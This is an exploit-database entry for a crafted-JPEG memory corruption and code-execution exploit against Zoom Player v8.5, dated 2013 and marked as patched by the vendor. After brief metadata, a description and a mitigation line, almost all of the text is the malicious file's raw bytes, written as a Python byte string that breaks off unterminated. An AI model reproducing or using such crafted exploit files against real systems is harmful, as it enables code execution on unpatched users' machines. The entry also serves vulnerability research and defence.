Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit

vendor:
Zoom Player
by:
Debasish Mandal
7.5
CVSS
HIGH
Memory Corruption and Arbitrary Code Execution
CWE
Product Name: Zoom Player
Affected Version From: Zoom Player v8.5
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2013
Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit

This exploit targets a vulnerability in Inmatrix Ltd. Zoom Player v8.5. By crafting a malicious JPEG file, an attacker can trigger a memory corruption issue and execute arbitrary code on the targeted system.
Mitigation:

The vendor has patched this issue and removed the affected version from their site. Users are advised to update to the latest version of Zoom Player to mitigate this vulnerability.
Source
Exploit-DB raw data:

# Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit.
# Version: Zoom Player v8.5
# Date: 09-1-2013
# Author: Debasish Mandal.
# Blog : http://www.debasish.in/
# Software Link: http://www.inmatrix.com/files/zoomplayer_download.shtml
# Vendor Homepage: http://www.inmatrix.com/
# Category: Local
# Tested on: Windows XP SP2.
# Vendor Patch:  This issue is patched and affected version is removed from site.
#                 http://forum.inmatrix.com/index.php?showtopic=13904

d = "\xA3\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x01\x00\x60\x00\x60\x00\x00\xFF\xED\x18\x2E\x50\x68\x6F\x74\x6F\x73\x68\x6F\x70\x20\x33\x2E\x30\x00\x38\x42\x49\x4D\x03\xED\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x00\x00\x00\x00\x10\x00\x60\x00\x00\x00\x01\x00\x01\x00\x60\x00\x00\x00\x01\x00\x01\x38\x42\x49\x4D\x04\x0D\x18\x46\x58\x20\x47\x6C\x6F\x62\x61\x6C\x20\x4C\x69\xE5\x68\x74\x69\x6E\x67\x20\x41\x6E\x67\x6C\x65\x00\x00\x00\x00\x04\x00\x00\x00\x78\x38\x42\x49\x4D\x04\x19\x12\x46\x58\x20\x47\x6C\x6F\x89\x61\x6C\x20\x41\x6C\x74\x69\x74\x75\x64\x65\x00\x00\x00\x00\x04\x00\x00\x00\x1E\x38\x42\x49\x4D\x03\xF3\x0B\x50\x72\x69\x6E\x74\x20\x46\x6C\x61\x67\x73\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x38\x42\x49\x4D\x04\x0A\x0E\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x20\x46\xA7\x61\x67\x00\x00\x00\x00\x01\x00\x00\x38\x42\x49\x4D\x27\x10\x14\x4A\x61\x70\x61\x6E\x65\x73\x65\x20\x50\x72\x69\x6E\x74\x20\x46\x6C\x61\x67\x73\x00\x00\x00\x00\x0A\x00\x01\x00\x00\x00\x39\x00\x00\x00\x02\x38\x42\x49\x4D\x03\xF5\x17\x43\x6F\x6C\x6F\x72\x20\x48\x61\x6C\x66\x74\x6F\x6E\x65\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x00\x00\x00\x48\x00\x2F\x66\x66\x00\x01\x00\x6C\x66\x66\x00\x06\x00\x00\x00\x00\x00\x01\x00\x2F\x66\x66\x00\x01\x00\xA1\x99\x9A\x00\x06\x00\x00\x00\x00\x00\x01\x00\x32\x00\x00\x00\x01\x00\x5A\x00\x00\x00\x06\x00\x00\x00\x00\x68\x01\x00\x35\x00\x00\x00\x01\x00\x2D\x00\x00\x00\x06\x00\x00\x00\x00\xA1\x01\x38\x42\x49\x4D\x03\xF8\x17\x43\x6F\x6C\x6F\x72\x20\x54\x72\x61\x6E\x73\x66\x65\x72\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x00\x00\x00\x70\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xB5\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x9D\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x38\x42\x49\x4D\x04\x08\x06\x47\x75\x69\x64\x65\x73\x00\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x02\x40\x00\x00\x02\x40\x00\x00\x00\x00\x38\x42\x49\x45\x04\x1E\x0D\x55\x52\x4C\x20\x6F\x76\x65\x72\x72\x69\x64\x65\x73\x00\x00\x00\x04\x00\x00\x00\x00\x38\x42\x49\x4D\x04\x1A\x06\x53\x6C\x69\x63\x65\x73\x00\x00\x00\x00\x75\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x58\x00\x00\x03\x20\xBC\x00\x00\x0A\x00\x55\x00\x6E\x00\x74\x00\x69\x00\x74\x00\x6C\x00\x65\x00\x64\x00\x2D\x00\x31\x00\x00\x00\x01\x00\x49\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x00\x00\x02\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x42\x49\x4D\x04\x11\x11\x49\x43\x43\x20\x55\x6E\x74\x61\x67\x67\x65\x64\x20\x46\x6C\x61\x67\x00\x00\x00\x01\x01\x00\x38\x42\x49\x4D\x04\x14\x17\x4C\x61\x79\x65\x72\x20\x49\x44\x20\x47\x65\x6E\x65\x72\x15\x74\x6F\x72\x20\x42\x61\x73\x65\x00\x00\x00\x04\x00\x00\x00\x02\x38\x42\x49\x4D\x04\x0C\x15\x4E\x65\x77\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x54\x8E\x75\x6D\x62\x6E\x61\x69\x6C\x00\x00\x14\x86\x00\x00\x00\x01\x00\x00\x00\x70\x00\x00\x00\x54\x00\x00\x01\x50\x00\x00\x6E\x40\x00\x00\x14\x6A\x00\x18\x00\x01\xFF\xD8\xAE\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x01\x00\x48\x00\x48\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00\x00\x01\xFF\xDB\x00\x84\x00\x0C\x08\x08\x08\x09\x08\x0C\x09\x09\x0C\x11\x0B\x0A\x0B\x11\x15\x0F\x0C\x0C\x0F\x15\x18\x13\x13\x15\x13\x13\x18\x11\x0C\x0C\x0C\x0C\x0C\x0C\x11\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x0D\x0B\x6A\x0D\x0E\x0D\x10\x0E\x0E\x10\x14\x0E\x0E\x0E\x14\x14\x0E\x0E\x0E\x0E\x14\x11\x0C\x0C\x0C\x0C\x0C\x11\x11\x0C\x0C\x0C\x0C\x0C\x0C\x11\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\xFF\xC0\x00\x11\x08\x00\x54\x00\x70\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xFF\xDD\x00\x04\x00\x07\xFF\xC4\x01\x3F\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x87\x00\x00\x03\x00\x01\x02\x04\x05\x06\x07\x08\x09\x0A\x0D\x01\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x03\x04\x05\x06\xB2\x08\x09\x0A\x0B\xCB\x00\x01\x04\x01\x22\xDE\x04\x02\x05\x07\x06\x08\x05\x03\x0C\x33\x01\x00\x02\x11\x03\x04\x21\x12\x31\x05\x41\x51\x61\x13\x22\x71\x81\x32\x06\x14\x91\xA1\xE8\x42\x28\x24\x15\x52\xC1\x62\x33\x34\x72\x82\xD1\x43\x07\x25\x92\x53\xF0\xE1\xF1\x63\x73\x35\x2D\xA2\x75\x83\x26\x44\x93\x54\x64\x45\xC2\xA3\x74\x36\x17\xD2\x55\xE2\x65\xF2\xB3\x84\xC3\xD3\x75\xE3\xF3\x46\x27\x94\xA4\x85\xB4\x95\xC4\xD4\xE4\xF4\xA5\xB5\xC5\xD5\xE5\xF5\x56\x66\x76\x86\x96\xA6\xB6\xC6\xD6\xE6\xF6\x37\x47\x57\x67\x77\x87\x97\xA7\xB7\xC7\xD7\xE7\xF7\x11\x00\x02\x02\x01\x02\x04\x04\x03\x04\x05\x06\x07\x07\x06\x05\x35\x01\x00\x02\x11\x03\x21\x31\x12\x04\x41\x51\x61\x71\x22\x13\x05\x32\x81\x91\x14\xA1\xB1\x42\x23\xC1\x52\xD1\xF0\x33\x24\x62\xE1\x72\x82\x92\x43\x53\x15\x63\x73\x34\xF1\x25\x06\x16\xA2\xB2\x83\x07\x26\x35\xC2\xD2\x44\x93\x54\x6C\x17\x64\x45\x55\x36\x74\x65\xE2\xF2\x0A\x84\xC3\xD3\x75\xE3\xF3\x46\x94\xA4\x85\xB4\x95\xC4\xD4\xE4\xF4\xA5\xB5\xC5\xD5\xE5\xF5\x56\x66\x76\x86\x96\xA6\xB6\xC6\xD6\xE6\xF6\x27\x37\x47\x57\x67\x77\x87\x97\xA7\xB7\xC7\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF3\xE7\x74\xCE\xB9\x95\xEA\xAC\xBB\x17\x22\xCD\xE7\x7D\xB6\x6D\x3C\xBC\xFD\x37\xF4\xEB\x7F\x94\x9A\x9A\x72\xB1\x6F\x25\xB9\x28\xC6\xB1\xA0\x4D\x94\xBF\xBE\x41\xF7\x16\xB6\xCC\x67\x3D\xAF\xFE\x55\x6B\xAB\xBE\xE6\x63\x39\x9F\xA7\x0D\x74\xC3\x6D\x92\xD1\x3F\xD7\xFD\xE5\x4F\x11\x8E\xCB\xC9\xB7\x27\x35\xBB\xF2\x5C\xE9\x73\x8C\x6A\x1B\xEC\xAF\xFE\x83\x56\x78\xE6\xE4\x60\x78\xA0\x23\x10\x34\x03\xAF\xF8\xEC\x63\x26\xF7\x1B\xFA\xB5\xF1\x7A\xC7\xD6\xB6\x52\xC7\x8A\xCE\x4B\x1C\x24\x7A\xED\x12\x22\x7E\x8E\xD7\x52\xF7\x35\xCA\xC3\x73\x7A\xD7\x50\xC6\x7B\x6D\xB9\x98\xBA\xB8\x5A\xCA\x6B\xF7\x85\x3F\x9A\x36\x3D\xEF\xFA\x4D\x77\xD0\x6A\xD3\x1B\x5C\x20\x82\x40\xF2\xD7\xF2\xA1\x59\xF7\x55\x6F\xDD\x45\x9B\x09\xE4\x10\x4B\x09\xFE\x53\x25\xBE\xE5\x50\xE4\x81\x3A\x62\xC7\x09\x5D\x89\x08\xFF\x00\x2F\xFA\x2B\x7D\xCF\xA3\x73\x07\x07\x1F\x13\x19\x94\xE3\x68\xC0\x04\xC1\x10\xE2\x04\x6F\x74\x7D\x27\x23\xD4\xFC\x61\x90\x69\xB6\xE2\xCB\xAD\xAF\x7D\x4D\x1F\x9C\x03\xA3\xFB\x3E\xEF\xA0\xB0\xB2\x3A\x85\xB8\x14\xB9\xDB\x4F\xA2\x75\xB1\xF5\x70\x09\xF6\x83\xB6\xD6\x3F\x6B\xBF\xF3\xE2\xA9\xFB\x63\x04\x65\xD7\x90\x32\xAE\xB9\xF9\x20\xB2\xE7\x6D\x1B\xEA\xD8\x19\xE8\x86\x57\xE9\xFD\x0F\xA7\xED\x6A\x6C\x79\x7C\x92\x26\x64\x19\x03\x74\x47\xA8\xF1\x0F\x57\xA9\xBD\x5E\xBB\xBD\x23\xAA\xA1\xC0\x8B\xDA\xC7\xD2\x01\x75\xBE\xA6\xAC\xD8\xDF\x7B\xDC\xFD\xDF\x9A\xD6\xAC\x19\x2C\x2C\x2D\xAF\x2C\x71\x55\x4D\xA5\xCE\xAC\xD8\x03\xD7\x19\xB9\xDE\x88\xB3\x76\xEF\xF0\x3B\x53\x5F\x5F\x54\xCE\xA8\xD4\xCB\xED\xC7\xC3\xB0\x45\xA6\xE2\xDF\x51\xED\xE7\x6B\x69\xA8\x37\xD2\x67\xFC\x63\xD5\x2D\x7C\x40\xDB\x03\x1F\x99\x91\x63\x59\xEE\x01\xCD\xAD\xC4\x11\xAB\x37\xB9\xCD\xF7\x31\x3A\x11\xE0\x89\xFD\x60\x06\x47\x58\x83\x2D\xA3\xFF\x00\xC1\x89\x04\xD0\xDD\x03\x59\x89\x8F\xC9\x32\x70\xAC\xAE\x8C\x96\x7B\xAB\xB9\x84\x9D\x90\x47\xD1\xB6\xBF\xE6\xEC\xA5\xFF\x00\x9E\xAA\xE5\x7D\x76\xEA\x59\xB8\xE7\x14\x57\x56\x3F\xA9\xFC\xED\x95\x17\x87\x6C\x0F\x73\xEB\xAE\x5C\xEF\x4B\x7E\xDF\x72\xD9\xCC\xC6\xAA\xDB\x2A\x6D\xC1\x9B\x2F\x92\xCB\xD8\xD0\x19\x32\x77\xD1\xB5\xBE\xDA\xEE\xFF\x00\x81\x77\xFD\x6D\x31\xC3\xC4\xBC\x7D\x96\xFA\xD8\xFC\x73\xCB\x60\x35\xCD\x6F\xEF\xB2\xD0\x37\xB7\x6A\x6A\x9E\x20\x44\xB2\xC0\xE4\x90\xD6\x32\x91\xD6\x11\xFF\x00\xBB\xFE\xE2\x63\x3A\x1A\xEA\xD3\x77\xD7\xB1\x61\x0C\xA7\x03\x63\x9C\x76\xB3\x7D\xDE\xC1\x27\xDB\xBB\x65\x6D\xF6\xAD\x0C\x9C\x36\x66\x58\xDB\x73\xC0\xC9\xB1\x82\x1A\xD2\x22\xB6\x7E\xF7\xA3\x4C\x9F\xA5\xFB\xCE\xF7\xAE\x0A\xAC\x2C\x9C\x9F\x50\xE2\x53\x65\xF5\xD6\x4C\xBD\xAD\x24\x01\x3E\xDD\xCE\x1E\xDF\x72\xE8\x7A\x7E\x4F\xD6\x3A\xDB\x45\x39\x75\xB5\xB4\x3D\xB3\x5D\xA9\x37\xF4\x84\x37\xF3\x7D\x8F\x6B\xF7\xFF\x00\xC7\x35\x49\x9F\x95\xC7\x8A\x8E\x03\x1C\x72\x17\xC4\x0C\xE5\xEE\x7F\x83\xC5\xC5\x25\xF3\x1A\x68\x69\xD4\x1D\x33\xA6\x3A\x77\xB3\x1A\x97\xB6\x35\x9A\xDA\x08\x23\x91\xBB\xE9\xAE\x6F\xEB\x07\x4B\xA3\x01\xF5\x5B\xF5\xE2\xCA\xEF\x2E\x1E\x89\x71\x3B\x4B\x43\x75\xAD\xD3\xB9\xD5\xFB\xBF\x3F\xE8\x2D\xAC\x67\xDD\xF6\x2A\xBA\xDB\x68\xDC\xE7\x0B\x61\xC0\x48\xDD\xEC\x3E\x94\xFF\x00\x83\x66\xD6\xB1\x66\xF5\xDE\x9F\x75\x95\x3B\x30\xDE\xFB\x4D\x02\x5E\x1E\x08\x80\xD2\x43\x7F\x43\xE9\xB1\x8D\xAF\xF9\x5F\xBE\x97\x2D\x39\xFD\x34\x44\xB2\x1E\x13\x5A\x1B\x3C\x5C\x63\xD2\xB6\x26\xA5\xBB\xFF\xD0\xE0\xB2\x3A\xDB\xEF\xAC\xD6\xCA\x18\xCD\xFA\x38\xBC\xEF\x91\xE6\xD7\x06\xB1\x47\xA4\x3B\xA8\xD7\x92\x29\xC1\x70\x2E\x70\x2F\x12\xB7\x0F\x60\x63\x07\xA9\x65\x96\xEE\xFE\x6D\x95\xD6\xDD\x9B\xB1\x8B\xA9\xEA\x38\x78\x59\x74\x3A\xCC\xAA\x05\xD6\x53\xB5\xCD\xB0\x12\x1E\xE0\xD2\x26\x97\x3A\xBD\xAE\x73\x2D\x9D\xAA\xD6\x5E\x0E\x0D\x94\xB6\xBA\x70\xAB\xC3\x73\x20\x36\xEC\x66\x96\x58\x5A\x34\xF4\xAE\xD4\xFD\xA2\x97\x37\xF9\xC6\x5E\xB2\xC7\x39\x84\x63\x31\x18\xCC\x78\xAF\x7F\xD6\x43\x88\x77\xFD\x29\x31\x89\x44\x0A\xAD\xDA\x18\x96\xE7\x64\x08\xBC\xD0\xC6\x3B\xB3\x03\x9C\x49\xFD\xDF\xA4\x07\xB9\xDF\x9A\xD5\xB9\x87\xF5\x7E\xFC\xCE\x9F\x66\x53\x2E\x68\xB9\xAC\xB4\x0A\x80\x30\x42\x0D\x7B\xF1\x35\xFA\x4D\xA9\xEE\x67\xA7\x73\x7F\x9C\xF5\x3F\x9B\x54\x71\xB1\xEF\x7E\x4B\xDB\x56\x33\xEF\x1F\x45\xA0\x36\x0D\x82\x3F\x32\xB0\xE2\xF6\xBD\x8B\x47\xA7\x75\xE7\xE2\x65\x7A\x8E\x73\x06\x2D\xE1\xE2\xCA\x8B\x4B\xAF\xB2\xC6\x6D\x67\xE8\xB6\xFF\x00\x35\x6F\xAA\xE6\xEC\xC7\xB3\xFE\xED\xFD\xA2\xCA\xFD\x3A\xD5\xBE\x5B\x95\xC3\x2C\x63\x21\x81\x91\x97\xE8\xD1\xE1\x6C\x60\xE5\xA1\x38\x71\x11\x67\xF7\x7E\x57\x9A\xFA\xE5\xF5\x7B\xAC\x51\xD4\x73\x59\x53\x6C\x77\x48\xC2\x0D\xB6\xBB\xEC\x0D\x6B\x75\x6D\x2D\xDA\x4B\x7F\x9E\xBB\xED\x9E\x3F\x64\xA7\xF7\xED\xF5\x76\x7F\x33\x91\xE9\x7B\xE9\x3D\x34\x74\xFA\x2D\xEA\x9D\x41\xEC\x60\xA9\x93\x45\x23\xDE\xF3\x63\xBF\x9A\x6C\x37\xD9\x5F\xA8\xEF\x67\xD3\xFD\xA1\xE9\x17\xA0\x75\x0C\xBC\x9E\xB5\x91\x46\x25\x4D\x65\x35\x75\x42\x32\x4C\x96\xC7\x0B\x5A\x06\x39\xB5\x8E\xC7\xC7\x78\xFA\x3E\x97\xD3\xCA\xB3\xFC\x2F\xAD\xFA\x3F\xD1\xAE\x6F\xAC\x7D\x5B\xEA\xCE\xC3\xB3\xD5\xA5\xA1\xCD\x7D\x35\xB5\x9B\xBE\x9D\x96\xCF\xC4\x6D\x31\xF4\xEA\x6F\xF8\x4F\xF8\x4F\x65\x48\x67\x04\x7E\xAE\x10\xFD\x55\xD6\x43\x1F\xF7\xFD\x29\x01\xC3\xFF\x00\x4D\x8F\x24\x08\x3C\x31\x1E\x90\x6A\x64\x6C\x3F\x4A\x41\xA8\x3A\xCF\x4F\xB2\xB0\x59\x73\x5D\x64\x0F\xD1\x80\x41\x2E\xFF\x00\x47\x5E\xE6\xB7\x77\xBB\xDA\xAD\x6F\xAF\xD2\x6B\x8B\x43\x1C\xE0\x0B\xBB\xC7\xF2\x77\x0F\xDD\x59\x4C\xE9\x5D\x3B\x12\xDA\xCA\xEF\x2E\xCC\xCC\x73\x37\xB2\xB6\x68\xD0\xE9\xF6\x1F\xDE\x63\x1D\xFE\x91\xFE\xFF\x00\xDC\xA9\x1A\x93\xF9\x75\xF5\xFA\x95\x6D\xC6\xB0\xB9\x90\x7D\xF1\x3A\x7B\x9A\xCB\x7F\x44\xDF\x55\x9B\x9B\xFD\x45\x47\xD9\x84\xA4\x3D\xBE\x2E\x02\x7E\x79\x22\x6F\xFB\xBF\xFA\x2B\x53\x88\x24\x0B\xDC\xA6\xCC\x2E\x7D\x2F\xA6\xBD\xAD\xC8\x70\x9A\x9A\x79\xDC\xC7\x07\x7A\x9F\xC9\xF4\xBF\x7D\x1D\x9F\x53\x7A\xCF\x51\x65\x37\x64\xE5\x1B\x31\xED\xDA\xE7\x32\xB1\xE9\xB3\x69\xAD\xF9\x36\x4C\x7E\x6D\x6D\xA7\xD2\xDD\xFE\x95\x5F\xB7\x03\x15\xF4\xB7\xA8\xB4\x87\x65\xB4\xFA\x76\xDE\x60\x0B\x99\xB5\xAC\x63\xED\x06\x1F\xF6\x9F\xD0\xFA\x19\x14\xFF\x00\xA7\xA3\xD4\xFE\x71\xF7\x7A\x9D\x67\x4A\xCC\xC0\x10\x14\x5B\xD3\x71\x5C\x58\xDA\xA8\xFB\x39\x2E\xF6\x87\xEF\x73\xDB\x99\x7E\x2E\xBB\xAD\xA9\x9B\x6D\xAF\xD6\xFD\xFF\x00\xF8\x3F\x7A\xD2\x1C\x8C\x31\x00\x38\xEE\x56\x4F\x15\x0B\xFF\x00\xBA\xE1\x6D\x3E\x4F\x80\x6A\x7A\xEF\x5F\x8B\xC5\xBA\xE1\x8A\xFC\x6C\x1A\x31\xDD\x5F\xDB\x2A\x19\x75\x51\x58\x0C\xAC\x52\xE2\x6B\xFB\x4B\xFF\x00\x77\xD4\xF4\xFF\x00\xE3\x14\xB3\x5B\x8D\x5E\x3B\xB2\x2F\x8A\xE9\xAB\x57\xD8\xE3\x10\x7C\x1A\x7E\x96\xFF\x00\xDD\x6B\x3D\xEB\x6F\xEB\xB7\x4E\xC3\x83\xB2\xBB\xB2\xB2\xEC\xC5\xC6\xC1\x02\x91\xF6\x70\x5D\x6C\x21\x6B\x55\xCE\xD6\x8D\xAC\x7E\x45\xCE\x6D\x7F\xCF\x3E\xAC\x7C\x3A\xAA\xFF\x00\xAB\xF4\xF8\x0C\x8F\xAB\xBD\x4D\xCE\xB7\x19\xD9\xB5\xD8\x71\xD9\xEB\x9A\xAC\xB5\xE5\xBF\xCA\xF4\xED\x7B\x45\x4E\xB2\x96\xB9\x9E\xA3\xFF\x00\x45\xF4\xFF\x00\x46\xA8\x64\xE4\x61\x19\x8B\xC8\x61\xFD\xEF\xE7\x27\xFB\xD3\x6B\x4B\x1F\x09\xA3\xA7\x9F\xCD\x21\xFB\xCB\x56\xF3\x9B\xD5\x47\xA0\x3B\xF6\x6B\xAB\xB5\x9E\xAB\x81\xFA\x12\x62\xED\xDA\x7D\x0B\x85\x7B\x3F\x97\xB1\x6B\xBF\x1E\xBB\x5E\x1B\x61\x36\xF7\x15\xBF\x50\x23\xF3\x8B\x3F\xC2\x7F\x59\x77\x27\xA7\x53\xD6\x70\x43\x02\x6E\x1D\xB9\x26\xB2\xD2\x6A\x63\x5C\xE8\xAE\xF0\xD3\x5D\xD5\xB9\x81\xFE\xCB\x5E\xAF\xD1\xA3\x3B\xAC\x61\xBF\x05\x99\x65\xA4\x5A\x2F\x6B\x18\xD2\x64\xED\x3F\xCF\x3C\xB0\x7D\x36\xD7\x5B\x3F\x47\xFF\x00\x0B\x72\x97\x2F\x2D\x94\xCE\x87\xA2\x31\xF9\x8A\x25\xE3\xD2\x8F\xFD\xDC\x97\x4B\x14\x89\xFD\xDA\x04\xEB\xFD\x5F\xD1\xFE\xF3\xFF\xD1\xCF\x60\xC4\xCB\x21\xFF\x00\x6A\x65\xAC\x60\x0E\x6D\x74\xD8\x00\xDC\x08\x2D\xB2\xD7\x35\xDE\xAD\x9B\x5F\xFC\xDB\x7D\x95\x7F\xC1\xFA\x88\x3D\x4B\xEB\x15\x78\x77\xB2\xCB\x2F\x66\x55\xB2\x7B\x6C\xAA\xB7\x30\xDB\x93\xDB\x1E\xE7\x6D\x3E\xFA\x6C\x6F\xFD\x35\xC7\xE6\xE2\x1A\xAE\xB1\xC3\x1D\xD5\x50\x5C\x5C\xC0\x4C\xC3\x49\xF6\x87\x3D\x9B\x9B\xED\x55\x86\xC9\x00\x34\xC9\xE0\x34\xEB\xFF\x00\x95\xB3\x61\xF0\xFC\x72\xA9\x19\x99\xC2\xBE\x5A\x8F\x5F\xEB\x44\xAC\x10\x1D\xF4\x7A\xEE\xAD\x7D\xBD\x67\x16\xB6\x50\x3E\xCD\x55\x36\x7A\x8C\xF5\x01\xF5\x6C\x71\x6E\xD6\xBC\x31\xBE\xDA\x2B\x64\xBB\xFC\x2F\xA8\xF5\x7A\x9F\xAB\xDD\x5E\xCC\x6F\xB6\x16\x67\xDB\x50\x60\x7D\x99\x4F\x78\xB1\x8E\x68\xDB\xB6\xEA\x85\x23\xD4\xFD\x0B\x1B\xE9\xBE\x55\x6F\xAC\xFD\x9F\xF1\x7E\x92\xC6\xC2\xC9\xEA\x99\x15\x83\x5E\x11\x20\x7F\x86\x71\x0D\x11\xF4\x67\xF4\x8E\x66\xE7\x6E\x6F\xE6\xAB\x18\xF9\x1D\x6B\x0C\xD8\xEC\x3C\x59\x8C\xFB\x03\xC9\xB6\x8B\x5C\xC2\x5E\x04\xFA\x8E\xAD\xCF\xFE\xCB\xFE\x9A\x7F\x2F\x2F\x62\x5C\x27\x83\x82\x3F\xA1\xC5\x09\x1F\x19\x4B\xF4\xD3\x86\x67\x1C\xC1\x34\x40\xFD\x1B\x7B\x3E\x9B\xD6\x3A\x75\x2D\xC5\xF5\xAC\x69\xFD\x2E\xE7\x91\xEE\xDA\x5F\x5B\xA9\xF5\x5B\x1E\xE7\x7E\x81\xDF\xA7\xD9\xF4\xD9\x47\xAC\x9F\xEB\x6F\x5A\xC7\xFB\x35\x8D\xA4\x9A\x9F\x69\x75\x4D\xB8\xB9\xAC\x76\xCA\xC5\xD8\xFB\xB1\x1E\x15\xD8\xFC\xC7\xDF\x97\x4D\x56\xFF\x00\xDC\x7A\xEE\xBD\x71\x99\x7D\x49\xF9\x0F\x1D\x43\xED\x21\xB9\x16\x37\x7B\x2B\xB1\xA1\xBB\x9E\xF6\xED\xDD\x4F\xA7\xE8\x5B\x53\xAC\xFE\x47\xB3\x7F\xE9\x10\xAF\xEA\x3D\x2A\xAA\xDA\x1F\x7F\xAE\x5A\xD0\xD0\x3F\x9C\x76\xD0\x34\xAD\xAD\xFA\x15\xB5\xBF\xE8\xF7\x2B\x19\x39\xB1\x20\x4C\x23\x33\x39\xE9\xC3\xC3\xC3\xC1\xE7\x26\xCE\x5E\x6B\x1C\xA3\x70\x84\xB8\xE5\x60\x83\xB3\x73\xA1\xE5\x63\xE2\x64\xD1\x6B\xC3\xB2\x0D\x0F\x0E\x36\x38\x83\x63\xA5\xC5\xDB\x5C\xFF\x00\xCE\xDA\xE3\xE9\xAE\xBF\x2B\xA8\xF4\xAA\x7A\x4D\xC2\xA0\xD3\x51\xB1\xAC\xAF\x16\xD6\xEF\x2E\xDF\x55\x6D\x76\x3E\xC7\x39\xAF\xF7\xDD\xBE\xC7\x5D\x5F\xE9\xBF\x43\x7B\xD7\x96\x9E\xA9\x58\xB5\xCF\xAE\xB7\x57\x5C\xC3\x6B\x69\x68\x6C\x7E\xF3\xEB\xF6\xBD\xDF\xC8\x45\xAB\xAD\xE4\x51\x77\xA9\x86\x7E\xB3\x6B\xF6\xD2\xD2\x4B\x43\x04\xFB\xB6\x68\xEF\x7D\x9F\xE1\x1E\xA5\xE2\xAC\x54\x21\x73\xAB\xE1\xBE\x1F\x57\xF7\xFF\x00\xAA\x88\xE4\x84\x71\x57\x09\x33\xDE\xAF\xAF\xF5\xA4\x49\x1D\x47\x26\x89\xCA\xC6\xA0\x3A\xEC\x3B\xDB\xB1\xAE\x2D\x6B\x2E\x61\x00\x06\x5C\x19\xA5\x79\x1E\x93\x9B\xFF\x00\x03\x97\xE8\xFD\x3F\x5A\xD5\xCD\x37\xEB\x0F\x53\x6F\x54\xC7\x9B\x5F\x8A\x58\xFD\x85\xCD\x9A\xC8\x05\x83\x14\x0D\xA7\x6F\xA6\xC6\xD2\xC6\x37\xFF\x00\x04\xFE\x71\x07\x33\xEB\x0E\x56\xCD\x95\xE3\x9C\x7D\xF3\xB1\xF6\x49\x74\x7F\x23\x73\x58\xCD\xC8\x18\xF4\x7E\xD1\x7D\x56\x5C\xC7\xDE\xE2\xC8\xB1\xE1\xD0\x64\x39\xE0\x6E\x73\xBF\x7B\x6A\x82\x39\x79\xF8\x12\x73\x54\x47\x43\x1A\xE2\x8F\x6F\xEA\xF0\xAC\xFB\xC6\x63\x1F\x51\xAA\xFD\x9B\x3D\x8B\xDB\x66\xD9\x76\xEB\x9C\xC6\xED\x68\x24\x13\x03\xF3\x2B\x6F\xB6\xB6\x2E\x6F\x3E\xFC\xAA\x73\xEF\xFB\x65\x6E\xC5\xB6\xE0\x48\x75\x91\xFC\xD5\x81\xBC\xED\xF6\xD9\xED\xAD\x59\xE9\x58\x9D\x62\x87\xC8\xAE\xCF\xFB\x36\x37\x66\x96\x7D\xA5\xC1\xBE\x55\xBF\xD3\x6B\x3F\xED\xD6\x2B\x1D\x43\xA7\xE6\xB8\xBF\x2A\x9E\xA5\x89\x93\xBA\x9F\x41\xF4\x3A\xB7\xB5\xCE\x68\x2E\x0D\x71\x28\xBE\xAB\x28\xF5\x1A\xD7\xFE\x65\xAA\xB6\x09\x4F\x1E\x59\x4A\x59\x21\x9B\x8C\x7C\xD2\x94\xB8\x98\xA1\x93\x86\x46\x52\x22\x44\xFE\xF2\x5E\x85\xF5\xB6\xAE\x9D\xD1\x32\xF1\x9E\x0B\xAF\x73\x83\x2A\xC8\x2E\x8F\x4D\xA1\x85\x98\xFE\x93\x5D\xEE\xDE\xDF\x5A\xDF